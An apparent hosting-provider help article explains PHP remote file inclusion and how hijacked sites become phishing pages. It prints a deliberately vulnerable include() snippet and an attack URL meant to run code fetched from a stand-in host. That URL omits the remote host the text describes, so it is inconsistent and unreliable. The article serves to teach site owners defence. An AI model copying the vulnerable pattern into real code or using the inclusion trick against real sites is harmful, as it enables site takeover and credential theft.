This article explains the most common security issue on a website built with PHP: weaknesses in the use of the include() function (PHP file inclusion). Misusing include() with unsanitised input on your Loopia web hosting can allow attackers to load remote PHP code and hijack your site.
How the attack works
A common approach taken by an attacker is to experiment with GET parameters to detect vulnerabilities, which are often related to how the website uses the include() function.
When such a problem is detected, it can be exploited by sending in specially crafted GET parameters that fool the website into loading PHP pages from other servers.
A PHP page that is loaded from another server could contain anything. For example, it may be a page that lets the attacker upload arbitrary files to any directory within the website. It could also be a phishing site that steals login information. You can read more about phishing here.
From hijacked site to phishing campaign
The person carrying out the attack then sends email to many addresses (a spam mailing), sets the sender to something that looks like the official website of the target, and includes a link to the hijacked home page, often with a message claiming that you need to log in to update your contact information or similar.
Because the page you arrive at when you click the link looks like the website’s normal login page, many people are fooled into logging in. They believe they need to change their password, as the email instructed them to do.
The fake login page saves the login information and emails it to an address controlled by the attacker. They then have access to many real logins on the website and could use these for example to empty bank accounts.
An example of the PHP include problem
If you have a website at http://www.example.com with a page called index.php with the following contents:
<html> <body> <?php include($_GET['page'].".php"); ?> </body> </html>
A visitor could now visit http://www.example.com/index.php?page=/exploit.txt.
Suppose there is PHP code at http://www.dangerous-site.com/exploit.txt.php, for example the code for an upload site. When you visit the URL above, this code will be executed. Because include() is used in this way, the page is loaded from www.dangerous-site.com but runs on www.example.com.
The visitor would now be able to upload files to www.example.com through the upload site. Of course it does not have to be an upload site; it could just as well be something else, such as a page that replaces index.php, removes or changes something on the website, or uploads a phishing site.